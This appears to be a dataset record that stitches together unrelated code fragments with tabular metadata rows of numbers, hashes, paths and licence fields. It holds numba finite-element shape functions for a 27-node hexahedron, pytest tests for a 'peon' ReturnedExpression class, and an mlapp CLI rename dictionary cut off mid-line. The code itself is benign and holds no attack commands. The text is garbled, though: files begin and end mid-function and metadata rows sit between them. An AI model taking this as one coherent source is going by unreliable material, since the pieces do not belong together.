0.5*s**2*t**2 + 0.5*s**2 - 0.5*s*t**2 + 0.5*s,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2*t - 0.5*r**2*t**2 + 0.5*r**2*t -
0.5*s**2*t**2 + 0.5*s**2*t + 0.5*t**2 - 0.5*t,
0.5*r**2*s**2*t**2 + 0.5*r**2*s**2*t - 0.5*r**2*t**2 - 0.5*r**2*t -
0.5*s**2*t**2 - 0.5*s**2*t + 0.5*t**2 + 0.5*t,
-1.0*r**2*s**2*t**2 + 1.0*r**2*s**2 + 1.0*r**2*t**2 - 1.0*r**2 +
1.0*s**2*t**2 - 1.0*s**2 - 1.0*t**2 + 1.0])
@njit(nogil=True, parallel=True, cache=__cache)
def shape_function_matrix_H27(pcoord: np.ndarray):
eye = np.eye(3, dtype=pcoord.dtype)
shp = shp_H27(pcoord)
res = np.zeros((3, 24), dtype=pcoord.dtype)
for i in prange(8):
res[:, i*3: (i+1) * 3] = eye*shp[i]
return res
@njit(nogil=True, cache=__cache)
def dshp_H27(pcoord):
r, s, t = pcoord
return np.array([
[0.25*r*s**2*t**2 - 0.25*r*s**2*t - 0.25*r*s*t**2 + 0.25*r*s*t -
0.125*s**2*t**2 + 0.125*s**2*t + 0.125*s*t**2 - 0.125*s*t,
0.25*r**2*s*t**2 - 0.25*r**2*s*t - 0.125*r**2*t**2 + 0.125*r**2*t
- 0.25*r*s*t**2 + 0.25*r*s*t + 0.125*r*t**2 - 0.125*r*t,
0.25*r**2*s**2*t - 0.125*r**2*s**2 - 0.25*r**2*s*t + 0.125*r**2*s
- 0.25*r*s**2*t + 0.125*r*s**2 + 0.25*r*s*t - 0.125*r*s],
[0.25*r*s**2*t**2 - 0.25*r*s**2*t - 0.25*r*s*t**2 + 0.25*r*s*t +
0.125*s**2*t**2 - 0.125*s**2*t - 0.125*s*t**2 + 0.125*s*t,
0.25*r**2*s*t**2 - 0.25*r**2*s*t - 0.125*r**2*t**2 + 0.125*r**2*t
+ 0.25*r*s*t**2 - 0.25*r*s*t - 0.125*r*t**2 + 0.125*r*t,
0.25*r**2*s**2*t - 0.125*r**2*s**2 - 0.25*r**2*s*t + 0.125*r**2*s
+ 0.25*r*s**2*t - 0.125*r*s**2 - 0.25*r*s*t + 0.125*r*s],
[0.25*r*s**2*t**2 - 0.25*r*s**2*t + 0.25*r*s*t**2 - 0.25*r*s*t +
0.125*s**2*t**2 - 0.125*s**2*t + 0.125*s*t**2 - 0.125*s*t,
0.25*r**2*s*t**2 - 0.25*r**2*s*t + 0.125*r**2*t**2 - 0.125*r**2*t
+ 0.25*r*s*t**2 - 0.25*r*s*t + 0.125*r*t**2 - 0.125*r*t,
0.25*r**2*s**2*t - 0.125*r**2*s**2 + 0.25*r**2*s*t - 0.125*r**2*s
+ 0.25*r*s**2*t - 0.125*r*s**2 + 0.25*r*s*t - 0.125*r*s],
[0.25*r*s**2*t**2 - 0.25*r*s**2*t + 0.25*r*s*t**2 - 0.25*r*s*t -
0.125*s**2*t**2 + 0.125*s**2*t - 0.125*s*t**2 + 0.125*s*t,
0.25*r**2*s*t**2 - 0.25*r**2*s*t + 0.125*r**2*t**2 - 0.125*r**2*t
- 0.25*r*s*t**2 + 0.25*r*s*t - 0.125*r*t**2 + 0.125*r*t,
0.25*r**2*s**2*t - 0.125*r**2*s**2 + 0.25*r**2*s*t - 0.125*r**2*s
- 0.25*r*s**2*t + 0.125*r*s**2 - 0.25*r*s*t + 0.125*r*s],
[0.25*r*s**2*t**2 + 0.25*r*s**2*t - 0.25*r*s*t**2 - 0.25*r*s*t -
0.125*s**2*t**2 - 0.125*s**2*t + 0.125*s*t**2 + 0.125*s*t,
0.25*r**2*s*t**2 + 0.25*r**2*s*t - 0.125*r**2*t**2 - 0.125*r**2*t
- 0.25*r*s*t**2 - 0.25*r*s*t + 0.125*r*t**2 + 0.125*r*t,
0.25*r**2*s**2*t + 0.125*r**2*s**2 - 0.25*r**2*s*t - 0.125*r**2*s
- 0.25*r*s**2*t - 0.125*r*s**2 + 0.25*r*s*t + 0.125*r*s],
[0.25*r*s**2*t**2 + 0.25*r*s**2*t - 0.25*r*s*t**2 - 0.25*r*s*t +
0.125*s**2*t**2 + 0.125*s**2*t - 0.125*s*t**2 - 0.125*s*t,
0.25*r**2*s*t**2 + 0.25*r**2*s*t - 0.125*r**2*t**2 - 0.125*r**2*t
+ 0.25*r*s*t**2 + 0.25*r*s*t - 0.125*r*t**2 - 0.125*r*t,
0.25*r**2*s**2*t + 0.125*r**2*s**2 - 0.25*r**2*s*t - 0.125*r**2*s
+ 0.25*r*s**2*t + 0.125*r*s**2 - 0.25*r*s*t - 0.125*r*s],
[0.25*r*s**2*t**2 + 0.25*r*s**2*t + 0.25*r*s*t**2 + 0.25*r*s*t +
0.125*s**2*t**2 + 0.125*s**2*t + 0.125*s*t**2 + 0.125*s*t,
0.25*r**2*s*t**2 + 0.25*r**2*s*t + 0.125*r**2*t**2 + 0.125*r**2*t
+ 0.25*r*s*t**2 + 0.25*r*s*t + 0.125*r*t**2 + 0.125*r*t,
0.25*r**2*s**2*t + 0.125*r**2*s**2 + 0.25*r**2*s*t + 0.125*r**2*s
+ 0.25*r*s**2*t + 0.125*r*s**2 + 0.25*r*s*t + 0.125*r*s],
[0.25*r*s**2*t**2 + 0.25*r*s**2*t + 0.25*r*s*t**2 + 0.25*r*s*t -
0.125*s**2*t**2 - 0.125*s**2*t - 0.125*s*t**2 - 0.125*s*t,
0.25*r**2*s*t**2 + 0.25*r**2*s*t + 0.125*r**2*t**2 + 0.125*r**2*t
- 0.25*r*s*t**2 - 0.25*r*s*t - 0.125*r*t**2 - 0.125*r*t,
0.25*r**2*s**2*t + 0.125*r**2*s**2 + 0.25*r**2*s*t + 0.125*r**2*s
- 0.25*r*s**2*t - 0.125*r*s**2 - 0.25*r*s*t - 0.125*r*s],
[-0.5*r*s**2*t**2 + 0.5*r*s**2*t + 0.5*r*s*t**2 - 0.5*r*s*t,
-0.5*r**2*s*t**2 + 0.5*r**2*s*t + 0.25*r**2*t**2 - 0.25*r**2*t +
0.5*s*t**2 - 0.5*s*t - 0.25*t**2 + 0.25*t,
-0.5*r**2*s**2*t + 0.25*r**2*s**2 + 0.5*r**2*s*t - 0.25*r**2*s +
0.5*s**2*t - 0.25*s**2 - 0.5*s*t + 0.25*s],
[-0.5*r*s**2*t**2 + 0.5*r*s**2*t + 0.5*r*t**2 - 0.5*r*t -
0.25*s**2*t**2 + 0.25*s**2*t + 0.25*t**2 - 0.25*t,
-0.5*r**2*s*t**2 + 0.5*r**2*s*t - 0.5*r*s*t**2 + 0.5*r*s*t,
-0.5*r**2*s**2*t + 0.25*r**2*s**2 + 0.5*r**2*t - 0.25*r**2 -
0.5*r*s**2*t + 0.25*r*s**2 + 0.5*r*t - 0.25*r],
[-0.5*r*s**2*t**2 + 0.5*r*s**2*t - 0.5*r*s*t**2 + 0.5*r*s*t,
-0.5*r**2*s*t**2 + 0.5*r**2*s*t - 0.25*r**2*t**2 + 0.25*r**2*t +
0.5*s*t**2 - 0.5*s*t + 0.25*t**2 - 0.25*t,
-0.5*r**2*s**2*t + 0.25*r**2*s**2 - 0.5*r**2*s*t + 0.25*r**2*s +
0.5*s**2*t - 0.25*s**2 + 0.5*s*t - 0.25*s],
[-0.5*r*s**2*t**2 + 0.5*r*s**2*t + 0.5*r*t**2 - 0.5*r*t +
0.25*s**2*t**2 - 0.25*s**2*t - 0.25*t**2 + 0.25*t,
-0.5*r**2*s*t**2 + 0.5*r**2*s*t + 0.5*r*s*t**2 - 0.5*r*s*t,
-0.5*r**2*s**2*t + 0.25*r**2*s**2 + 0.5*r**2*t - 0.25*r**2 +
0.5*r*s**2*t - 0.25*r*s**2 - 0.5*r*t + 0.25*r],
[-0.5*r*s**2*t**2 - 0.5*r*s**2*t + 0.5*r*s*t**2 + 0.5*r*s*t,
-0.5*r**2*s*t**2 - 0.5*r**2*s*t + 0.25*r**2*t**2 + 0.25*r**2*t +
0.5*s*t**2 + 0.5*s*t - 0.25*t**2 - 0.25*t,
-0.5*r**2*s**2*t - 0.25*r**2*s**2 + 0.5*r**2*s*t + 0.25*r**2*s +
0.5*s**2*t + 0.25*s**2 - 0.5*s*t - 0.25*s],
[-0.5*r*s**2*t**2 - 0.5*r*s**2*t + 0.5*r*t**2 + 0.5*r*t -
0.25*s**2*t**2 - 0.25*s**2*t + 0.25*t**2 + 0.25*t,
-0.5*r**2*s*t**2 - 0.5*r**2*s*t - 0.5*r*s*t**2 - 0.5*r*s*t,
-0.5*r**2*s**2*t - 0.25*r**2*s**2 + 0.5*r**2*t + 0.25*r**2 -
0.5*r*s**2*t - 0.25*r*s**2 + 0.5*r*t + 0.25*r],
[-0.5*r*s**2*t**2 - 0.5*r*s**2*t - 0.5*r*s*t**2 - 0.5*r*s*t,
-0.5*r**2*s*t**2 - 0.5*r**2*s*t - 0.25*r**2*t**2 - 0.25*r**2*t +
0.5*s*t**2 + 0.5*s*t + 0.25*t**2 + 0.25*t,
-0.5*r**2*s**2*t - 0.25*r**2*s**2 - 0.5*r**2*s*t - 0.25*r**2*s +
0.5*s**2*t + 0.25*s**2 + 0.5*s*t + 0.25*s],
[-0.5*r*s**2*t**2 - 0.5*r*s**2*t + 0.5*r*t**2 + 0.5*r*t +
0.25*s**2*t**2 + 0.25*s**2*t - 0.25*t**2 - 0.25*t,
-0.5*r**2*s*t**2 - 0.5*r**2*s*t + 0.5*r*s*t**2 + 0.5*r*s*t,
-0.5*r**2*s**2*t - 0.25*r**2*s**2 + 0.5*r**2*t + 0.25*r**2 +
0.5*r*s**2*t + 0.25*r*s**2 - 0.5*r*t - 0.25*r],
[-0.5*r*s**2*t**2 + 0.5*r*s**2 + 0.5*r*s*t**2 - 0.5*r*s +
0.25*s**2*t**2 - 0.25*s**2 - 0.25*s*t**2 + 0.25*s,
-0.5*r**2*s*t**2 + 0.5*r**2*s + 0.25*r**2*t**2 - 0.25*r**2 +
0.5*r*s*t**2 - 0.5*r*s - 0.25*r*t**2 + 0.25*r,
-0.5*r**2*s**2*t + 0.5*r**2*s*t + 0.5*r*s**2*t - 0.5*r*s*t],
[-0.5*r*s**2*t**2 + 0.5*r*s**2 + 0.5*r*s*t**2 - 0.5*r*s -
0.25*s**2*t**2 + 0.25*s**2 + 0.25*s*t**2 - 0.25*s,
-0.5*r**2*s*t**2 + 0.5*r**2*s + 0.25*r**2*t**2 - 0.25*r**2 -
0.5*r*s*t**2 + 0.5*r*s + 0.25*r*t**2 - 0.25*r,
-0.5*r**2*s**2*t + 0.5*r**2*s*t - 0.5*r*s**2*t + 0.5*r*s*t],
[-0.5*r*s**2*t**2 + 0.5*r*s**2 - 0.5*r*s*t**2 + 0.5*r*s -
0.25*s**2*t**2 + 0.25*s**2 - 0.25*s*t**2 + 0.25*s,
-0.5*r**2*s*t**2 + 0.5*r**2*s - 0.25*r**2*t**2 + 0.25*r**2 -
0.5*r*s*t**2 + 0.5*r*s - 0.25*r*t**2 + 0.25*r,
-0.5*r**2*s**2*t - 0.5*r**2*s*t - 0.5*r*s**2*t - 0.5*r*s*t],
[-0.5*r*s**2*t**2 + 0.5*r*s**2 - 0.5*r*s*t**2 + 0.5*r*s +
0.25*s**2*t**2 - 0.25*s**2 + 0.25*s*t**2 - 0.25*s,
-0.5*r**2*s*t**2 + 0.5*r**2*s - 0.25*r**2*t**2 + 0.25*r**2 +
0.5*r*s*t**2 - 0.5*r*s + 0.25*r*t**2 - 0.25*r,
-0.5*r**2*s**2*t - 0.5*r**2*s*t + 0.5*r*s**2*t + 0.5*r*s*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2 - 1.0*r*t**2 + 1.0*r -
0.5*s**2*t**2 + 0.5*s**2 + 0.5*t**2 - 0.5,
1.0*r**2*s*t**2 - 1.0*r**2*s - 1.0*r*s*t**2 + 1.0*r*s,
1.0*r**2*s**2*t - 1.0*r**2*t - 1.0*r*s**2*t + 1.0*r*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2 - 1.0*r*t**2 + 1.0*r +
0.5*s**2*t**2 - 0.5*s**2 - 0.5*t**2 + 0.5,
1.0*r**2*s*t**2 - 1.0*r**2*s + 1.0*r*s*t**2 - 1.0*r*s,
1.0*r**2*s**2*t - 1.0*r**2*t + 1.0*r*s**2*t - 1.0*r*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2 - 1.0*r*s*t**2 + 1.0*r*s,
1.0*r**2*s*t**2 - 1.0*r**2*s - 0.5*r**2*t**2 + 0.5*r**2 -
1.0*s*t**2 + 1.0*s + 0.5*t**2 - 0.5,
1.0*r**2*s**2*t - 1.0*r**2*s*t - 1.0*s**2*t + 1.0*s*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2 + 1.0*r*s*t**2 - 1.0*r*s,
1.0*r**2*s*t**2 - 1.0*r**2*s + 0.5*r**2*t**2 - 0.5*r**2 -
1.0*s*t**2 + 1.0*s - 0.5*t**2 + 0.5,
1.0*r**2*s**2*t + 1.0*r**2*s*t - 1.0*s**2*t - 1.0*s*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2*t - 1.0*r*t**2 + 1.0*r*t,
1.0*r**2*s*t**2 - 1.0*r**2*s*t - 1.0*s*t**2 + 1.0*s*t,
1.0*r**2*s**2*t - 0.5*r**2*s**2 - 1.0*r**2*t + 0.5*r**2 -
1.0*s**2*t + 0.5*s**2 + 1.0*t - 0.5],
[1.0*r*s**2*t**2 + 1.0*r*s**2*t - 1.0*r*t**2 - 1.0*r*t,
1.0*r**2*s*t**2 + 1.0*r**2*s*t - 1.0*s*t**2 - 1.0*s*t,
1.0*r**2*s**2*t + 0.5*r**2*s**2 - 1.0*r**2*t - 0.5*r**2 -
1.0*s**2*t - 0.5*s**2 + 1.0*t + 0.5],
[-2.0*r*s**2*t**2 + 2.0*r*s**2 + 2.0*r*t**2 - 2.0*r,
-2.0*r**2*s*t**2 + 2.0*r**2*s + 2.0*s*t**2 - 2.0*s,
-2.0*r**2*s**2*t + 2.0*r**2*t + 2.0*s**2*t - 2.0*t]])
@njit(nogil=True, parallel=True, cache=__cache)
def dshp_H27_bulk(pcoords: ndarray):
nP = pcoords.shape[0]
res = np.zeros((nP, 27, 3), dtype=pcoords.dtype)
for iP in prange(nP):
res[iP] = dshp_H27(pcoords[iP])
return res
@njit(nogil=True, parallel=True, fastmath=True, cache=__cache)
def volumes_H27(ecoords: np.ndarray, qpos: np.ndarray,
qweight: np.ndarray):
nE = ecoords.shape[0]
volumes = np.zeros(nE, dtype=ecoords.dtype)
nQ = len(qweight)
for iQ in range(nQ):
dshp = dshp_H27(qpos[iQ])
for i in prange(nE):
jac = ecoords[i].T @ dshp
djac = np.linalg.det(jac)
volumes[i] += qweight[iQ] * djac
return volumes
class H27(TriquadraticHexaHedron):
"""
27-node isoparametric triquadratic hexahedron
top
7---14---6
| | |
15--25--13
| | |
4---12---5
middle
19--23--18
| | |
20--26--21
| | |
16--22--17
bottom
3---10---2
| | |
11--24---9
| | |
0----8---1
"""
@classmethod
def lcoords(cls, *args, **kwargs):
return np.array([
[-1., -1., -1], [1., -1., -1.], [1., 1., -1.], [-1., 1., -1.],
[-1., -1., 1.], [1., -1., 1.], [1., 1., 1.], [-1., 1., 1.],
[0., -1., -1.], [1., 0., -1.], [0., 1., -1.], [-1., 0., -1.],
[0., -1., 1.], [1., 0., 1.], [0., 1., 1.], [-1., 0., 1.],
[-1., -1., 0.], [1., -1., 0.], [1., 1., 0.], [-1., 1., 0.],
[-1., 0., 0.], [1., 0., 0.], [0., -1., 0.], [0., 1., 0.],
[0., 0., -1.], [0., 0., 1.], [0., 0., 0.]])
@classmethod
def lcenter(cls, *args, **kwargs):
return np.array([0., 0., 0.])
def shape_function_derivatives(self, coords=None, *args, **kwargs):
coords = self.pointdata.x.to_numpy() if coords is None else coords
if len(coords.shape) == 2:
return dshp_H27_bulk(coords)
else:
return dshp_H27(coords)
def volumes(self, coords=None, topo=None):
coords = self.pointdata.x.to_numpy() if coords is None else coords
topo = self.nodes.to_numpy() if topo is None else topo
ecoords = cells_coords(coords, topo)
qpos, qweight = Gauss(3, 3, 3)
return volumes_H27(ecoords, qpos, qweight)
| 51.828746
| 79
| 0.387656
| 4,690
| 16,948
| 1.392964
| 0.02516
| 0.102862
| 0.118935
| 0.072861
| 0.814786
| 0.801776
| 0.77407
| 0.76657
| 0.7531
| 0.748967
| 0
| 0.256666
| 0.267583
| 16,948
| 326
| 80
| 51.98773
| 0.269637
| 0.014987
| 0
| 0.219858
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035461
| false
| 0
| 0.021277
| 0.007092
| 0.099291
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
db7ad8d065ccfcdf01d0e72a9074476aee53011d
| 12,395
|
py
|
Python
|
peon/tests/test_project/test_file/test_function_def/test_expressions/test_returned_expr.py
|
roch1990/peon
|
0e9e40956c05138c0820fe380b354fdd1fe95e01
|
[
"MIT"
] | 32
|
2020-05-18T14:02:59.000Z
|
2022-02-06T15:00:12.000Z
|
peon/tests/test_project/test_file/test_function_def/test_expressions/test_returned_expr.py
|
roch1990/peon
|
0e9e40956c05138c0820fe380b354fdd1fe95e01
|
[
"MIT"
] | 42
|
2020-05-22T20:29:08.000Z
|
2021-03-10T21:24:23.000Z
|
peon/tests/test_project/test_file/test_function_def/test_expressions/test_returned_expr.py
|
roch1990/peon
|
0e9e40956c05138c0820fe380b354fdd1fe95e01
|
[
"MIT"
] | 4
|
2020-07-02T06:32:42.000Z
|
2022-01-24T22:46:02.000Z
|
import _ast
import sys
import pytest
from peon.src.project.file.function_def.expression.returned_expr import ReturnedExpression
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_func():
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Attribute(
value=_ast.Name(id='Function', ctx=_ast.Load()), attr='staticm', ctx=_ast.Load(),
), args=[], keywords=[],
),
lineno=1,
),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_int_one():
# when method return 1
assert ReturnedExpression(_ast.Return(value=_ast.Num(n=1), lineno=1)).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_int_zero():
# when method return 0
assert ReturnedExpression(_ast.Return(value=_ast.Num(n=0), lineno=1)).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_float_zero():
# when method return 0.0
assert ReturnedExpression(_ast.Return(value=_ast.Num(n=0.0), lineno=1)).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_float_limit_to_zero():
# when method return 0.0000000000000000000000001
assert ReturnedExpression(
_ast.Return(value=_ast.Num(n=0.0000000000000000000000001), lineno=1),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_string():
# when method return ''
try:
assert ReturnedExpression(_ast.Return(value=_ast.Str(s=''), lineno=1)).value_not_none() is False
except (AttributeError):
pass
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_string():
# when method return 'test'
try:
assert ReturnedExpression(_ast.Return(value=_ast.Str(s='test'), lineno=1)).value_not_none() is True
except (AttributeError):
pass
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_joined_string():
# when method return ''
assert ReturnedExpression(_ast.Return(value=_ast.JoinedStr(values=[]), lineno=1)).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_joined_string():
# when method return '{}{}{}'.format('a', 'b', 'c')
assert ReturnedExpression(_ast.Return(value=_ast.JoinedStr(values=['a', 'b', 'c']), lineno=1)).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_none():
# when method return None
assert ReturnedExpression(_ast.Return(value=_ast.NameConstant(value=None), lineno=1)).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_class_constant():
# when method return SomeClass.CONSTANT
assert ReturnedExpression(
_ast.Return(
value=_ast.Attribute(value=_ast.Name(id='SomeClass', ctx=_ast.Load()), attr='CONSTANT', ctx=_ast.Load()),
lineno=1,
),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_list():
# when method return []
assert ReturnedExpression(
_ast.Return(value=_ast.List(elts=[], ctx=_ast.Load()), lineno=1),
).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_list():
# when method return ['1']
assert ReturnedExpression(
_ast.Return(value=_ast.List(elts=['1'], ctx=_ast.Load()), lineno=1),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_tuple():
# when method return ()
assert ReturnedExpression(
_ast.Return(value=_ast.Tuple(elts=[], ctx=_ast.Load()), lineno=1),
).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_tuple():
# when method return ('1')
assert ReturnedExpression(
_ast.Return(value=_ast.Tuple(elts=['1'], ctx=_ast.Load()), lineno=1),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_dict():
# when method return {}
assert ReturnedExpression(
_ast.Return(value=_ast.Dict(keys=[], values=[]), lineno=1),
).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_dict():
# when method return {'1': '2'}
assert ReturnedExpression(
_ast.Return(value=_ast.Dict(keys=['1'], values=['2']), lineno=1),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_dict_by_keyword():
# when method return dict()
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='dict', ctx=_ast.Load()), args=[], keywords=[],
),
lineno=1,
),
).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_dict_by_keyword():
# when method return dict(a='b')
try:
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='dict', ctx=_ast.Load()), args=[],
keywords=[_ast.keyword(arg='a', value=_ast.Str(s='b'))],
),
lineno=1,
),
).value_not_none() is True
except (AttributeError):
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='dict', ctx=_ast.Load()), args=[],
keywords=[_ast.keyword(arg='a', value=_ast.JoinedStr(values=['a', 'b']))],
),
lineno=1,
),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_list_by_keyword():
# when method return list()
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='list', ctx=_ast.Load()), args=[], keywords=[],
),
lineno=1,
),
).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_list_by_keyword():
# when method return list('1')
try:
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='list', ctx=_ast.Load()), args=[_ast.Str(s='1')], keywords=[],
),
lineno=1,
),
).value_not_none() is True
except (AttributeError):
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='list', ctx=_ast.Load()), args=[_ast.JoinedStr(values=['a', 'b'])], keywords=[],
),
lineno=1,
),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_set_by_keyword():
# when method return set()
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='set', ctx=_ast.Load()), args=[], keywords=[],
),
lineno=1,
),
).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_set_by_keyword():
# when method return set('1')
try:
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='set', ctx=_ast.Load()), args=[_ast.Str(s='1')], keywords=[],
),
lineno=1,
),
).value_not_none() is True
except (AttributeError):
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='set', ctx=_ast.Load()), args=[_ast.JoinedStr(values=['1'])], keywords=[],
),
lineno=1,
),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_tuple_by_keyword():
# when method return tuple()
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='tuple', ctx=_ast.Load()), args=[], keywords=[],
),
lineno=1,
),
).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_tuple_by_keyword():
# when method return tuple('1')
try:
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='tuple', ctx=_ast.Load()), args=[_ast.Str(s='1')], keywords=[],
),
lineno=1,
),
).value_not_none() is True
except (AttributeError):
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='tuple', ctx=_ast.Load()), args=[_ast.JoinedStr(values=['1'])], keywords=[],
),
lineno=1,
),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_empty_frozenset_by_keyword():
# when method return frozenset()
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='frozenset', ctx=_ast.Load()), args=[], keywords=[],
),
lineno=1,
),
).value_not_none() is False
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_value_is_filled_frozenset_by_keyword():
# when method return frozenset('1')
try:
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='frozenset', ctx=_ast.Load()), args=[_ast.Str(s='1')], keywords=[],
),
lineno=1,
),
).value_not_none() is True
except (AttributeError):
assert ReturnedExpression(
_ast.Return(
value=_ast.Call(
func=_ast.Name(id='frozenset', ctx=_ast.Load()), args=[_ast.JoinedStr(values=['1'])], keywords=[],
),
lineno=1,
),
).value_not_none() is True
@pytest.mark.skipif(sys.version_info > (3, 7), reason='test marked as for older pythen version (<3.8)')
def test_return_is_empty():
# when method return nothing, not None, only 'return'
assert ReturnedExpression(
_ast.Return(
value=None,
lineno=1,
),
).value_not_none() is False
| 37
| 123
| 0.613231
| 1,619
| 12,395
| 4.463249
| 0.058678
| 0.091337
| 0.123305
| 0.150706
| 0.937586
| 0.923194
| 0.897592
| 0.84708
| 0.826875
| 0.758926
| 0
| 0.023881
| 0.243243
| 12,395
| 334
| 124
| 37.110778
| 0.746482
| 0.062767
| 0
| 0.730924
| 0
| 0
| 0.12253
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 1
| 0.11245
| true
| 0.008032
| 0.016064
| 0
| 0.128514
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db88b060b33d3569dae91b802a9af593f466df5b
| 20,257
|
py
|
Python
|
mlapp/mlapp_cli/common/model_rename_dictionary.py
|
nbk905/mlapp
|
af650a8a302959674dd5a1bc6d15e30e90abf227
|
[
"Apache-2.0"
] | null | null | null |
mlapp/mlapp_cli/common/model_rename_dictionary.py
|
nbk905/mlapp
|
af650a8a302959674dd5a1bc6d15e30e90abf227
|
[
"Apache-2.0"
] | null | null | null |
mlapp/mlapp_cli/common/model_rename_dictionary.py
|
nbk905/mlapp
|
af650a8a302959674dd5a1bc6d15e30e90abf227
|
[
"Apache-2.0"
] | null | null | null |
rename_dictionary = {
"base": {
# key -> file_name: value -> list of dictionaries of words to replace.
'_data_manager.py': {
"words": [{"word": 'DataManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_model_manager.py': {
"words": [{"word": 'ModelManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_train_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
